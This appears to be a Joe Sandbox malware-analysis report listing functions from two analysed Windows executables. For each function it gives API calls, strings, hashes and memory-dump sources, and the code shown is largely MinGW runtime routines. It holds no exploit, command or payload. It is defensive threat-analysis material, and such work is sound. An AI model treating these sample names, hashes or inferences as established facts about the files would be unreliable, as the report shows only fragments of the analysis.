Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: wcslen$memsetwcscatwcscpywcsncmp
String ID: 0$X$`
API String ID: 329590056-2527496196
Opcode ID: 1367f86378d13e6249d5f239218ccb32a66bc86646381168925fa02af27368da
Instruction ID: 57e59b4db19a0981c0c0907a086748f0a0adfb9be9ed45f70292e3d5c0e21c04
Opcode Fuzzy Hash: 1367f86378d13e6249d5f239218ccb32a66bc86646381168925fa02af27368da
Instruction Fuzzy Hash: AC02BE32908B81C2E7609F69E8053AA77A1FF857A4F044239DA9C87BE6DF3CD145C758

Function 00007FF6880C1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1C63
VirtualProtect.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1CC7
memcpy.MSVCRT ref: 00007FF6880C1CE0
GetLastError.KERNEL32(?,?,?,?,00007FF6880CB7AC,00007FF6880CB7AC,?,?,00007FF6880C0000,?,00007FF6880C1991), ref: 00007FF6880C1D23

Strings

Address %p has no image-section, xrefs: 00007FF6880C1CF4
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6880C1D17
VirtualProtect failed with code 0x%x, xrefs: 00007FF6880C1D29

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 45b11c7b96de9d61924da4bdc5ecca7e23204424f414426a2fc417c111c69661
Instruction ID: c77f9037e17ef4358867e12ce8975fb8fb7ded2bfeb587f834c9480a379d1c47
Opcode Fuzzy Hash: 45b11c7b96de9d61924da4bdc5ecca7e23204424f414426a2fc417c111c69661
Instruction Fuzzy Hash: 00419F71A08A46C2EB109F65E8846B82762FF85B81F54403ADE0DC37E7DE3CE585C728

Function 00007FF6880C2104 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6880C2118
TlsGetValue.KERNEL32 ref: 00007FF6880C214F
GetLastError.KERNEL32 ref: 00007FF6880C2154
LeaveCriticalSection.KERNEL32 ref: 00007FF6880C2212
free.MSVCRT ref: 00007FF6880C2234
DeleteCriticalSection.KERNEL32 ref: 00007FF6880C225D

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
String ID:
API String ID: 3326252324-0
Opcode ID: 965d46179bfd094fd32f4ef9d5af756bb0da220d1805e035f603a074db3337d7
Instruction ID: fd9d5b653996d55cbb89b7b39b0197a7b40568ee472fbe2333f3aaa9d38d077f
Opcode Fuzzy Hash: 965d46179bfd094fd32f4ef9d5af756bb0da220d1805e035f603a074db3337d7
Instruction Fuzzy Hash: 0121FC24E19902D6FA19AF71E9503782362BF50B91F58003DC91DD7EEADF2CE956C328

Function 00007FF6880C1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CCG , xrefs: 00007FF6880C1E27

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: c7dd1b12a8f86e9c939c86805264989c4934cfd42abad53a8de843c27f745bc3
Instruction ID: 4a8dde3979b99b903ed99c0f289eaf7ce8831368300f2eb384fd9b8799683236
Opcode Fuzzy Hash: c7dd1b12a8f86e9c939c86805264989c4934cfd42abad53a8de843c27f745bc3
Instruction Fuzzy Hash: EF218161E0C106C2FB755EB495903791183BF89766F28853EE91DC33D6DE6CEC82C269

Function 00007FF6880C38E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF6880C38F8
wcslen.MSVCRT ref: 00007FF6880C396E

Strings

@, xrefs: 00007FF6880C392A
0, xrefs: 00007FF6880C3922

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 133498ee64f7adbd6e78beab45bf08e8a131ce13eee2b31ff79bcdc99f4c26c8
Instruction ID: 009be5bc604784a2fa69a10bb90bd4cf670fce17f6132caac32cecf3cb4866d9
Opcode Fuzzy Hash: 133498ee64f7adbd6e78beab45bf08e8a131ce13eee2b31ff79bcdc99f4c26c8
Instruction Fuzzy Hash: 73114A22528681C2E3109F64F44579AA375FFD4394F505128F68982AA9EF7DC146CB14

Function 00007FF6880C1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6880C1247), ref: 00007FF6880C19F9

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF6880C1B8B
Unknown pseudo relocation bit size %d., xrefs: 00007FF6880C1B7B

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 178236622e18bfdc7cbd0492b3c825996c37cce24ac31dfacb8cd4114762312e
Instruction ID: 03556a3474686fee90b799db84f02628d099d5a4de313289f17405ab70463a33
Opcode Fuzzy Hash: 178236622e18bfdc7cbd0492b3c825996c37cce24ac31dfacb8cd4114762312e
Instruction Fuzzy Hash: A9516762E08546C6EB109F36E9457B82762FF04BA5F084139D91D877EACF3CE586C728

Function 00007FF6880C1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fprintf.MSVCRT ref: 00007FF6880C185A

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6880C184D
Unknown error, xrefs: 00007FF6880C1824

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: a44f12ad135a22f97608606533fe7126ffd357917123931733c1ac1fccfa0826
Instruction ID: 4f33d5f43f79ff290aba1291039b422a3fd137411e72ffc7bb9e407406362d53
Opcode Fuzzy Hash: a44f12ad135a22f97608606533fe7126ffd357917123931733c1ac1fccfa0826
Instruction Fuzzy Hash: 20F0C261E0CA45C2E310AF34AA410B9A362FF597C1F409239DE4DD3692DF2CE182C324

Function 00007FF6880C219E Relevance: 5.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6880C21B2
TlsGetValue.KERNEL32 ref: 00007FF6880C21EB
GetLastError.KERNEL32 ref: 00007FF6880C21F0
LeaveCriticalSection.KERNEL32 ref: 00007FF6880C226C

Memory Dump Source

Source File: 00000001.00000002.1790359041.00007FF6880C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6880C0000, based on PE: true

Associated: 00000001.00000002.1790324357.00007FF6880C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790391453.00007FF6880CA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790419340.00007FF6880CC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1790479634.00007FF6880CD000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791031623.00007FF688349000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1791080220.00007FF688380000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6880c0000_gfiKDLgr58thy4d.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 07a5c0968da69d30ac8125b5aec9bec45e2b6413f89b4661317775645502ba2c
Instruction ID: 9d616f08a7be02b5e19b7d724165d9b83262b58c212509fd36fbcdcccd825ad8
Opcode Fuzzy Hash: 07a5c0968da69d30ac8125b5aec9bec45e2b6413f89b4661317775645502ba2c
Instruction Fuzzy Hash: 2401E825A09A02D6F6199F71ED542782262BF14B91F490039CE1DD3EEADF2CE995C318

Analysis Process: GR55Qg1hth.exePID: 7540, Parent PID: 7452COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	2.1%
Signature Coverage:	11.6%
Total number of Nodes:	931
Total number of Limit Nodes:	20

Executed Functions

Function 00007FF650222F30 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_stricmp.MSVCRT ref: 00007FF650223144
strcmp.MSVCRT ref: 00007FF65022334E
strcmp.MSVCRT ref: 00007FF650223400
strcmp.MSVCRT ref: 00007FF6502234A7
strcmp.MSVCRT ref: 00007FF650223557
strcmp.MSVCRT ref: 00007FF6502235FA
strcmp.MSVCRT ref: 00007FF65022367A

Strings

}, xrefs: 00007FF6502234BC
y, xrefs: 00007FF6502232A9
KF , xrefs: 00007FF65022361B

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: strcmp$_stricmp
String ID: KF $y$}
API String ID: 3398372305-1747734038
Opcode ID: 13ef81c63967c5c04ea5b67463ae1f840b2fdf113d5fa974f652ee7e296297f5
Instruction ID: b9e432087aa2aeb0355574a203c4ad5fbc56911daa2a4975e857d752d431c454
Opcode Fuzzy Hash: 13ef81c63967c5c04ea5b67463ae1f840b2fdf113d5fa974f652ee7e296297f5
Instruction Fuzzy Hash: 4A22A032A18BC3A5EB21CB69E9053AA7BA4FF55784F485131DA8C93B96EF3CD145C700

Function 00007FF6502216C0 Relevance: 17.3, APIs: 11, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF6502216E9
GetTickCount64.KERNEL32 ref: 00007FF6502216FA

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: b4f3fe240c14dbf4906e9ed1916a183c68da1a0d21a8ea7e6a5a99d43bf79f11
Instruction ID: 59df070b20c020bbcc287f37edc3b698419502012b05ccbd53f249cc4a2d49ea
Opcode Fuzzy Hash: b4f3fe240c14dbf4906e9ed1916a183c68da1a0d21a8ea7e6a5a99d43bf79f11
Instruction Fuzzy Hash: D6820431A187C3A1FB218B69E9057BA7BA0FB95784F484231DE8CA7B95EF2DD145C700

Function 00007FF650221190 Relevance: 10.7, APIs: 7, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF6502211F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF650221268
malloc.MSVCRT ref: 00007FF65022133C
malloc.MSVCRT ref: 00007FF650221384
memcpy.MSVCRT ref: 00007FF65022139C
GetStartupInfoW.KERNEL32 ref: 00007FF65022148E

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: f85f7434ef34ca8fea9adb256391a91387b5457ced506d25832c3763a6de91f3
Instruction ID: cc77f7c200330d109750f9f4391da373b849b9f1139b974a0bfe6c68f88ece4e
Opcode Fuzzy Hash: f85f7434ef34ca8fea9adb256391a91387b5457ced506d25832c3763a6de91f3
Instruction Fuzzy Hash: 2F916835E29657E1EB60AB96EA41B7D2BA1BF55780F4C4135DE0DE3792DF2CE8428300

Function 00007FF650252240 Relevance: 1.4, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650251750: malloc.MSVCRT ref: 00007FF650251761

Part of subcall function 00007FF650249EC0: strlen.MSVCRT ref: 00007FF650249EEB

Part of subcall function 00007FF65022FC80: RtlCaptureContext.KERNEL32 ref: 00007FF65022FD05
Part of subcall function 00007FF65022FC80: RtlUnwindEx.KERNEL32 ref: 00007FF65022FD23
Part of subcall function 00007FF65022FC80: abort.MSVCRT ref: 00007FF65022FD29

Part of subcall function 00007FF65024A040: strlen.MSVCRT ref: 00007FF65024A06B

Part of subcall function 00007FF65024A550: strlen.MSVCRT ref: 00007FF65024A57B

Part of subcall function 00007FF650249600: strlen.MSVCRT ref: 00007FF65024962B

Part of subcall function 00007FF65024A720: strlen.MSVCRT ref: 00007FF65024A74B

Part of subcall function 00007FF65024A8A0: strlen.MSVCRT ref: 00007FF65024A8CB

malloc.MSVCRT ref: 00007FF650252502

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 91e57bacc0d8cdc9738f951960cfd1da9c6fb9b24bff88cb80a7e28fbeebe90b
Instruction ID: afcfab1082b7e48a3eb92457763b723a0493a1f427335a5e8b4af971d1f38491
Opcode Fuzzy Hash: 91e57bacc0d8cdc9738f951960cfd1da9c6fb9b24bff88cb80a7e28fbeebe90b
Instruction Fuzzy Hash: C6616F34A0A607B0EA14AB57B9553B66760BF4ABC9F881435ED8DAB396DF3CE044C344

Function 00007FF6502522E0 Relevance: 1.4, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650251750: malloc.MSVCRT ref: 00007FF650251761

Part of subcall function 00007FF65024A550: strlen.MSVCRT ref: 00007FF65024A57B

Part of subcall function 00007FF65022FC80: RtlCaptureContext.KERNEL32 ref: 00007FF65022FD05
Part of subcall function 00007FF65022FC80: RtlUnwindEx.KERNEL32 ref: 00007FF65022FD23
Part of subcall function 00007FF65022FC80: abort.MSVCRT ref: 00007FF65022FD29

Part of subcall function 00007FF650249600: strlen.MSVCRT ref: 00007FF65024962B

Part of subcall function 00007FF65024A720: strlen.MSVCRT ref: 00007FF65024A74B

Part of subcall function 00007FF65024A8A0: strlen.MSVCRT ref: 00007FF65024A8CB

malloc.MSVCRT ref: 00007FF650252502

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 0530b2e8acd1ac2ac662b571c82e61b0b7f385c1e6f4f4076ee8c420478a61e7
Instruction ID: 549f1dca3e95ed8d2dc24445a4ae46dee3fbfb0dee9cf17b0f9300d0494d5349
Opcode Fuzzy Hash: 0530b2e8acd1ac2ac662b571c82e61b0b7f385c1e6f4f4076ee8c420478a61e7
Instruction Fuzzy Hash: 3C518135A0A607A0FA14AB17F9553BA6760BB497C8F8C1435ED8DAB3A6DF7CE044C344

Function 00007FF650236E20 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF650236E28
CreateMutexA.KERNEL32 ref: 00007FF650236F37
WaitForSingleObject.KERNEL32 ref: 00007FF650236F48
FindAtomA.KERNEL32 ref: 00007FF650236F5D
AddAtomA.KERNEL32 ref: 00007FF650236F9D
_onexit.MSVCRT ref: 00007FF650236FBA
ReleaseMutex.KERNEL32 ref: 00007FF650236FC2
CloseHandle.KERNEL32 ref: 00007FF650236FCB

Strings

aaaaaaaa, xrefs: 00007FF650236EDE
__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa, xrefs: 00007FF650236E9B, 00007FF650236F56, 00007FF650236F96, 00007FF650236FE7
HeBnAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF650236E2E, 00007FF650236EEF
aaaaaaaa, xrefs: 00007FF650236ED4
__shmem3_winpthreads_tdm_, xrefs: 00007FF650236E77, 00007FF650236EA7
failed to add string to atom table, xrefs: 00007FF650237083
failed to to lock creation mutex, xrefs: 00007FF650237096
failed to get string from atom, xrefs: 00007FF6502370B6

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
